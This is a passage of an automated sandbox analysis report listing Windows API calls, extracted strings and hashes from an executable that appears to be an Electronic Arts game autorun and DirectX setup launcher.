                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: FPN8
                                                                                                                        • API String ID: 0-3045010520
                                                                                                                        • Opcode ID: edb593c32b61e57108da3a0b80af04005ee91a1e55d6cc48912163f838f1da77
                                                                                                                        • Instruction ID: 0ae34cf69a8ab284ccd46dc62b6aad79bebef21a7217951b099a750fc97bdae0
                                                                                                                        • Opcode Fuzzy Hash: edb593c32b61e57108da3a0b80af04005ee91a1e55d6cc48912163f838f1da77
                                                                                                                        • Instruction Fuzzy Hash: 8561F7A2D082259BF7149B65DC849FB7774EF85310F1440BAD80D672C1E63C6EC5CB66
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: @J2G
                                                                                                                        • API String ID: 0-3264548725
                                                                                                                        • Opcode ID: 81a836e66e4d380549ba96175722a1bbd639395fd3f17a86fd6a2d2d497a7908
                                                                                                                        • Instruction ID: 33fde268ea3d09e424a0bc3102b001c06874382390dbdac9628847d6a7409590
                                                                                                                        • Opcode Fuzzy Hash: 81a836e66e4d380549ba96175722a1bbd639395fd3f17a86fd6a2d2d497a7908
                                                                                                                        • Instruction Fuzzy Hash: F96154E2C112559BE7148B24DC98AFB7778EF81314F1581FED80AA7680D23C5ED2CA66
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b0f4d8db58f026a845213fc1b87d2411c782b3a521c0d40067012ddbee180b44
                                                                                                                        • Instruction ID: 8118a5aba1bf8fac790b82b1f093b7fb56dd6f0a1e18ac8f50b078235c599629
                                                                                                                        • Opcode Fuzzy Hash: b0f4d8db58f026a845213fc1b87d2411c782b3a521c0d40067012ddbee180b44
                                                                                                                        • Instruction Fuzzy Hash: 0A5159B2C042649FEB108B64DC546EB7B74EF46310F1441FAD94DAB282E23C4EC2CB56
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00413B40: LoadLibraryA.KERNEL32 ref: 00413B5A
                                                                                                                          • Part of subcall function 00413B40: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00413B6A
                                                                                                                          • Part of subcall function 00413B40: GetSystemDirectoryA.KERNEL32(0045DAF8,00000104), ref: 00413B95
                                                                                                                          • Part of subcall function 00413B40: GetWindowsDirectoryA.KERNEL32(0045DD08,00000104), ref: 00413BA5
                                                                                                                          • Part of subcall function 00413B40: GetTempPathA.KERNEL32(00000104,0045DE10), ref: 00413BB5
                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000400,?,Version,?,?,80000002,?,?,?,?), ref: 00417198
                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?,?,?,?), ref: 004171A8
                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?,dsetup.dll,?,?,?,?), ref: 004171C8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Directory$Current$AddressLibraryLoadPathProcSystemTempWindows
                                                                                                                        • String ID: %d.%d.%d$%d.%d.%d.%d$8.1$CD NEWER THAN HD$CD OLDER THAN HD$CD SAME AS HD$Software\Microsoft\DirectX$UNKNOWN$Version$Windows 2000$Windows XP$dsetup.dll$m_DirectXSetupGetVersion is NULL$oops
                                                                                                                        • API String ID: 3989195010-3706638769
                                                                                                                        • Opcode ID: 4f7dd495da0e88cbd4bd1521b7c72d64d317f7bf7d4b1a0ada1672d325655e65
                                                                                                                        • Instruction ID: 82d168655b0c159cb1636abc6d3beedafcc5df099369e82530c6fe2580bb6615
                                                                                                                        • Opcode Fuzzy Hash: 4f7dd495da0e88cbd4bd1521b7c72d64d317f7bf7d4b1a0ada1672d325655e65
                                                                                                                        • Instruction Fuzzy Hash: 19A1A07560C380ABE324DB54C840BEBB7F9EBD5711F10491EF985932C1DB78A889CB5A
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Internet Explorer,00000000,00020019,?), ref: 00415C61
                                                                                                                        • RegQueryValueExA.ADVAPI32(?,Version,00000000,00000000,?,?), ref: 00415C92
                                                                                                                        • RegQueryValueExA.ADVAPI32(?,IVer,00000000,00000000,?,?), ref: 00415D29
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00415E54
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: QueryValue$CloseOpen
                                                                                                                        • String ID: %d.%d$100$101$102$103$1215$1300$Build$IVer$Software\Microsoft\Internet Explorer$Version
                                                                                                                        • API String ID: 1586453840-2685558121
                                                                                                                        • Opcode ID: 5c89114449e6bc325828eae396e07a57128cb86573d4cfcd060cf77c0c08b7f8
                                                                                                                        • Instruction ID: de899b3a32cb2af15eaa5d18eb6ecfaec54b5d6c66715f52551f9a2aa385845c
                                                                                                                        • Opcode Fuzzy Hash: 5c89114449e6bc325828eae396e07a57128cb86573d4cfcd060cf77c0c08b7f8
                                                                                                                        • Instruction Fuzzy Hash: 4861D3B1A047459BEB20DF14D844BEB7BE9EBC8704F144429F6449B380DB789945CB9B
                                                                                                                        APIs
                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00416955
                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?), ref: 00416969
                                                                                                                        • LoadLibraryA.KERNEL32(dsetup.dll), ref: 00416981
                                                                                                                        • GetProcAddress.KERNEL32(00000000,DirectXSetupA), ref: 0041699A
                                                                                                                        • GetProcAddress.KERNEL32(?,DirectXSetupGetVersion), ref: 004169BE
                                                                                                                        • GetProcAddress.KERNEL32(?,DirectXSetupGetEULAA), ref: 004169E2
                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?), ref: 004169EC
                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?), ref: 00416A18
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectory$AddressProc$LibraryLoad
                                                                                                                        • String ID: Cannot get address of DirectXSetupA$Cannot get address of DirectXSetupGetVersion$Could not load dsetup.dll$DirectXSetupA$DirectXSetupGetEULAA$DirectXSetupGetVersion$Dsetup.dll$dsetup.dll
                                                                                                                        • API String ID: 3383375925-590746012
                                                                                                                        • Opcode ID: 6728013ffcc9761fc737054107d104eea82b8e14e575de02be08ca56f5759ead
                                                                                                                        • Instruction ID: 931795e1dae7218fb21f2bd96e0d81854005b1a274691680fd43d5dea92e8a10
                                                                                                                        • Opcode Fuzzy Hash: 6728013ffcc9761fc737054107d104eea82b8e14e575de02be08ca56f5759ead
                                                                                                                        • Instruction Fuzzy Hash: 2421F5B52413006FE320AB64AD85F9BB7A8DB95B11F11892FFE85D3281DA78D444CB39
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(USER32), ref: 00422BAD
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 00422BC9
                                                                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00422BDA
                                                                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00422BEB
                                                                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 00422BFC
                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 00422C0D
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00422C1E
                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 00422C2F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                        • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                                                        • API String ID: 667068680-68207542
                                                                                                                        • Opcode ID: 810a936632be2ce720fafd58cbae2f49093b75e770282222fd5374265a0f73c0
                                                                                                                        • Instruction ID: f307c977e25abfbff0b048e106a8ea6a6bb34d05222bffd66cc64a19540436b9
                                                                                                                        • Opcode Fuzzy Hash: 810a936632be2ce720fafd58cbae2f49093b75e770282222fd5374265a0f73c0
                                                                                                                        • Instruction Fuzzy Hash: 9D215471A21721AB87959F767EC052FBAF4F649B853A0483FE804E2661C7B88049DF5C
                                                                                                                        APIs
                                                                                                                        • GetShortPathNameA.KERNEL32(?,?,00000400), ref: 004107BD
                                                                                                                        • GetLastError.KERNEL32(00000400,?,00000000,00000000,80000002,?,80000002,?), ref: 00410858
                                                                                                                        • FormatMessageA.KERNEL32(00001300,00000000,00000000), ref: 00410866
                                                                                                                        • LocalFree.KERNEL32(?), ref: 0041088D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFormatFreeLastLocalMessageNamePathShort
                                                                                                                        • String ID: DirectX Installed$Game Registry$Installed From$Language$Registration$Restart$SOFTWARE\$SOFTWARE\Electronic Arts\%s\%s\ergc$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\$\$can't read setRestartFlag
                                                                                                                        • API String ID: 3903020775-341092691
                                                                                                                        • Opcode ID: 3d2759c5747e591e863665242978f06756fe076df6fdbafd9d5ebf5856d5d1e5
                                                                                                                        • Instruction ID: 5a2e11cbfe557d20dc58b77cc88c52bee8573eb501d7b283b44b6156cc505af9
                                                                                                                        • Opcode Fuzzy Hash: 3d2759c5747e591e863665242978f06756fe076df6fdbafd9d5ebf5856d5d1e5
                                                                                                                        • Instruction Fuzzy Hash: A69122712083429BD714DF24C811BFBB7E1FBD5704F004A2EF99597280DBB9A889C799
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32 ref: 00413B5A
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00413B6A
                                                                                                                        • GetSystemDirectoryA.KERNEL32(0045DAF8,00000104), ref: 00413B95
                                                                                                                        • GetWindowsDirectoryA.KERNEL32(0045DD08,00000104), ref: 00413BA5
                                                                                                                        • GetTempPathA.KERNEL32(00000104,0045DE10), ref: 00413BB5
                                                                                                                        • RegOpenKeyExA.ADVAPI32(0040476A), ref: 00413C4F
                                                                                                                        • RegQueryValueExA.ADVAPI32(?,Programs,00000000,?,0045DF18,?), ref: 00413C6F
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00413C76
                                                                                                                        • _strrchr.LIBCMT ref: 00413D9B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Directory$AddressCloseLibraryLoadOpenPathProcQuerySystemTempValueWindows_strrchr
                                                                                                                        • String ID: Programs$SHGetSpecialFolderPathA$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$\$shell32.dll
                                                                                                                        • API String ID: 1347129311-4127225528
                                                                                                                        • Opcode ID: 20eca63b0d048e5c17978578e2be2ad518ba2d992f55c58b281d0522d216412c
                                                                                                                        • Instruction ID: 6c29c0d113d401325f6edbdc8838ba9d779a9de3388efc35fe5fb8b828dee468
                                                                                                                        • Opcode Fuzzy Hash: 20eca63b0d048e5c17978578e2be2ad518ba2d992f55c58b281d0522d216412c
                                                                                                                        • Instruction Fuzzy Hash: AA512834348341AFE720CF649C16FEB7B945F46B06F14445DF980AB283E6A8D648C7AE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressDirectoryLibraryLoadProc$PathSystemTempWindows
                                                                                                                        • String ID: 1.0$DisplayName$Folder$Game Registry$Install Dir$Installed From$Language$LogFile$Product GUID$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
                                                                                                                        • API String ID: 497994091-4186521962
                                                                                                                        • Opcode ID: a9f3cfae0ee65188ce86cf1ac736f3b955c48210e815747326e6e50c8de1dc14
                                                                                                                        • Instruction ID: 591559e4e45c4ad2df08bd76a610f775a632586859adfb02992c4f405d6477a4
                                                                                                                        • Opcode Fuzzy Hash: a9f3cfae0ee65188ce86cf1ac736f3b955c48210e815747326e6e50c8de1dc14
                                                                                                                        • Instruction Fuzzy Hash: 8FA1F27110C3819FD714DF10C451BEBB7E5AFD8308F044A6EF98957281EB78AA49CBA6
                                                                                                                        APIs
                                                                                                                        • CoInitialize.OLE32(00000000), ref: 0041BD52
                                                                                                                        • CoCreateInstance.OLE32 ref: 0041BD7A
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 0041BE09
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 0041BE4B
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 0041BE85
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000008,0000000A,00000000,00000000), ref: 0041BEBD
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 0041BEDB
                                                                                                                        • CoUninitialize.OLE32 ref: 0041BF1D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$Clear$ByteCharCreateInitInitializeInstanceMultiUninitializeWide
                                                                                                                        • String ID: DxDiag_SystemInfo$dwDirectXVersionMajor$dwDirectXVersionMinor$o$szDirectXVersionLetter
                                                                                                                        • API String ID: 2631059323-2475506770
                                                                                                                        • Opcode ID: 45ec07c7a0de31864688631775407bbafd12fcb00f604bec3ea34e2fc70ed8bd
                                                                                                                        • Instruction ID: b5decee8adbc2d1d78082e6867677709e582f8e87df30048daafc0e7f78e0333
                                                                                                                        • Opcode Fuzzy Hash: 45ec07c7a0de31864688631775407bbafd12fcb00f604bec3ea34e2fc70ed8bd
                                                                                                                        • Instruction Fuzzy Hash: D3511674208381AFD700CF25C884A9BBBE9EFCA704F04894EF584C7261D779D985CBA6
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00414930: LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 004149A7
                                                                                                                          • Part of subcall function 00414930: GetProcAddress.KERNEL32(00000000,CopyFileExA), ref: 004149BC
                                                                                                                          • Part of subcall function 00413B40: LoadLibraryA.KERNEL32 ref: 00413B5A
                                                                                                                          • Part of subcall function 00413B40: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00413B6A
                                                                                                                          • Part of subcall function 00413B40: GetSystemDirectoryA.KERNEL32(0045DAF8,00000104), ref: 00413B95
                                                                                                                          • Part of subcall function 00413B40: GetWindowsDirectoryA.KERNEL32(0045DD08,00000104), ref: 00413BA5
                                                                                                                          • Part of subcall function 00413B40: GetTempPathA.KERNEL32(00000104,0045DE10), ref: 00413BB5
                                                                                                                        • GetFileAttributesA.KERNEL32(?,?,00000000), ref: 0040C0FD
                                                                                                                        • SetFileAttributesA.KERNEL32(?,00000000), ref: 0040C10C
                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 0040C117
                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 0040C12B
                                                                                                                        • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040C30F
                                                                                                                        • SetFileAttributesA.KERNEL32(?,00000000,?,?,?,?,?,00000000), ref: 0040C321
                                                                                                                        • Sleep.KERNEL32(000001F4,?,?,?,?,?,00000000), ref: 0040C32C
                                                                                                                        • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,00000000), ref: 0040C343
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFileSleep$AddressDirectoryLibraryLoadProc$PathSystemTempWindows
                                                                                                                        • String ID: %s\AutoRun.exe$%s\AutoRunGUI.dll$-restart -dir $Could not copy '%s' to '%s'
                                                                                                                        • API String ID: 3057974866-2581532531
                                                                                                                        • Opcode ID: fd5262b79a8323c6ee9bbbd5519ee61f856e7b900ff64039663f89a4e1efefc1
                                                                                                                        • Instruction ID: 5c815c8dee34c80f282a7deb6532afe064d91d0bacc265e00ff7ac027498d6f5
                                                                                                                        • Opcode Fuzzy Hash: fd5262b79a8323c6ee9bbbd5519ee61f856e7b900ff64039663f89a4e1efefc1
                                                                                                                        • Instruction Fuzzy Hash: C8B199B2144340AFD315EBA0CCC5EEB73A9EFC4704F044E2EB58657191EB78A648C79A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: %s\%s$%s\cache.dat$%s\filelist.txt$\$\$\
                                                                                                                        • API String ID: 0-1652018963
                                                                                                                        • Opcode ID: be913b56ed26ee2750d62859451965158e8d14aa541663ac7088a56196c6f96f
                                                                                                                        • Instruction ID: 726ea9fac86a746ee88a84a523912b90f33f2c02f38a423fdf5978b62fbff5e6
                                                                                                                        • Opcode Fuzzy Hash: be913b56ed26ee2750d62859451965158e8d14aa541663ac7088a56196c6f96f
                                                                                                                        • Instruction Fuzzy Hash: 42D15C715083829FC321DB34D894BEBB7E5AF95308F04495EE5C987281EB38D64DCB56
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: %s\%s$%s\cache.dat$%s\filelist.txt$\$\$\
                                                                                                                        • API String ID: 0-1652018963
                                                                                                                        • Opcode ID: 0327c2d6323db41f253a0066c32c2d91ef57ac9b8a11f82df8a7614baadf85a6
                                                                                                                        • Instruction ID: 2d8a66965c8b461d22716a2f9fc51bb70f3807e377028b73b074f7c4a795e774
                                                                                                                        • Opcode Fuzzy Hash: 0327c2d6323db41f253a0066c32c2d91ef57ac9b8a11f82df8a7614baadf85a6
                                                                                                                        • Instruction Fuzzy Hash: B0C15E715083829FC321DB20D894FEBB7E9AF95308F08495EE5C987241EB38D64DCB96
                                                                                                                        APIs
                                                                                                                        • RegEnumKeyExA.ADVAPI32 ref: 004175AE
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 004175F5
                                                                                                                        • RegOpenKeyExA.ADVAPI32 ref: 0041761F
                                                                                                                        • RegCloseKey.ADVAPI32(?,?), ref: 0041763F
                                                                                                                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 00417651
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0041766F
                                                                                                                        • RegCloseKey.ADVAPI32(?,00000000,00020019,?), ref: 00417707
                                                                                                                        • RegOpenKeyExA.ADVAPI32 ref: 00417731
                                                                                                                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 00417744
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00417755
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Close$DeleteOpen$Enum
                                                                                                                        • String ID: %s\%s
                                                                                                                        • API String ID: 2508677364-4073750446
                                                                                                                        • Opcode ID: 46427c48c67e0cc231f759d9888d3613f253180f667232f7090628fbc8ee51e4
                                                                                                                        • Instruction ID: 890bdd7ef58192d3601e2139cb52636c82b3411bbe28373fb4b23228c678dd54
                                                                                                                        • Opcode Fuzzy Hash: 46427c48c67e0cc231f759d9888d3613f253180f667232f7090628fbc8ee51e4
                                                                                                                        • Instruction Fuzzy Hash: 8C5191B55087419FD320DF58D884AEBB7F8FB89314F044D2EF99683241D7389A48CB66
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,774D0A60,00000000,0042575D), ref: 0042B11D
                                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0042B135
                                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0042B142
                                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0042B14F
                                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0042B15C
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0042B1DA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$CurrentHandleModuleThread
                                                                                                                        • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$kernel32.dll
                                                                                                                        • API String ID: 46939698-282957996
                                                                                                                        • Opcode ID: fa3fe8352348c15f00598b62091e80e0ddde9f8a27996319b7a897add45f9042
                                                                                                                        • Instruction ID: 8343617a602856c7a5069f3be63dd48b7f90f14781bef638d1b05418c87fafc1
                                                                                                                        • Opcode Fuzzy Hash: fa3fe8352348c15f00598b62091e80e0ddde9f8a27996319b7a897add45f9042
                                                                                                                        • Instruction Fuzzy Hash: D321B0706513609BC7B09FB6BC0592B3BE0EB427B9761093FE800C32A0EB789805DB5D
                                                                                                                        APIs
                                                                                                                        • RemoveDirectoryA.KERNEL32 ref: 00418F96
                                                                                                                        • GetTempPathA.KERNEL32(00000104,?,?,?,?,?,?), ref: 0041901D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: DirectoryPathRemoveTemp
                                                                                                                        • String ID: %s\cache.dat$%s\filelist.txt$\$\$\
                                                                                                                        • API String ID: 1713547617-3190903220
                                                                                                                        • Opcode ID: fe41703e54320f95e6681c1eb24154ae3abf6755114a66f0cff30b271b00e26e
                                                                                                                        • Instruction ID: 9d8b5efe2bea3eca9e416bc16e4a7f17c4f3e66b95ae640699afb986d6dc11f0
                                                                                                                        • Opcode Fuzzy Hash: fe41703e54320f95e6681c1eb24154ae3abf6755114a66f0cff30b271b00e26e
                                                                                                                        • Instruction Fuzzy Hash: B8715B710083869FC331DB20D8A4BE7B7E9AFD9308F04495EE5C987241EB39964DC74A
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: Version
                                                                                                                        • String ID: Microsoft Win32s$Unknown$Windows 2000$Windows 95$Windows 98$Windows ME$Windows NT$Windows XP
                                                                                                                        • API String ID: 1889659487-1287414207
                                                                                                                        • Opcode ID: 454356975ecda9a0999586d875334d146cb9ecda42628de8b5ed3d6ee45c621a
                                                                                                                        • Instruction ID: 975d6d164ef17e93e1c34ab1fc7ce7197d2ce6e84d94eff38267c9a8d95a5eee
                                                                                                                        • Opcode Fuzzy Hash: 454356975ecda9a0999586d875334d146cb9ecda42628de8b5ed3d6ee45c621a
                                                                                                                        • Instruction Fuzzy Hash: B3510EFC9063428BC369CF18FC509997BE5EB9A316B05467ED86883372D7309484CB5E
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 0043649A
                                                                                                                        • FindResourceA.KERNEL32(?,00000000,00000005), ref: 004364D2
                                                                                                                        • LoadResource.KERNEL32(?,00000000,?,?,?,?,?,?,?,00000064,00000000), ref: 004364DA
                                                                                                                          • Part of subcall function 00438DD6: UnhookWindowsHookEx.USER32(?), ref: 00438DFB
                                                                                                                        • LockResource.KERNEL32(00000000,?,?,?,?,?,?,?,00000064,00000000), ref: 004364EC
                                                                                                                        • GetDesktopWindow.USER32 ref: 00436519
                                                                                                                        • IsWindowEnabled.USER32(00000000), ref: 00436527
                                                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 00436536
                                                                                                                        • EnableWindow.USER32(00000000,00000001), ref: 004365C5
                                                                                                                        • GetActiveWindow.USER32 ref: 004365D0
                                                                                                                        • SetActiveWindow.USER32(00000000,?,?,?,?,?,?,?,?,00000064,00000000), ref: 004365DE
                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000064,00000000), ref: 004365FA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Resource$ActiveEnable$DesktopEnabledFindFreeH_prologHookLoadLockUnhookWindows
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 833315621-0
                                                                                                                        • Opcode ID: e199c737b50d517b0b306a191cb206ffac98a79345493696f53003073e33933f
                                                                                                                        • Instruction ID: f6843848d02d9acbe4f9de89053a38c821629bc9e9d675896fa0d8a5ac17685f
                                                                                                                        • Opcode Fuzzy Hash: e199c737b50d517b0b306a191cb206ffac98a79345493696f53003073e33933f
                                                                                                                        • Instruction Fuzzy Hash: C741D030900706FFCF21AFA5E84976EBBB5BF09715F11403EF501A22A1CB785A41CA5E
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExA.ADVAPI32(0040476A), ref: 00413C4F
                                                                                                                        • RegQueryValueExA.ADVAPI32(?,Programs,00000000,?,0045DF18,?), ref: 00413C6F
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00413C76
                                                                                                                        • _strrchr.LIBCMT ref: 00413D9B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
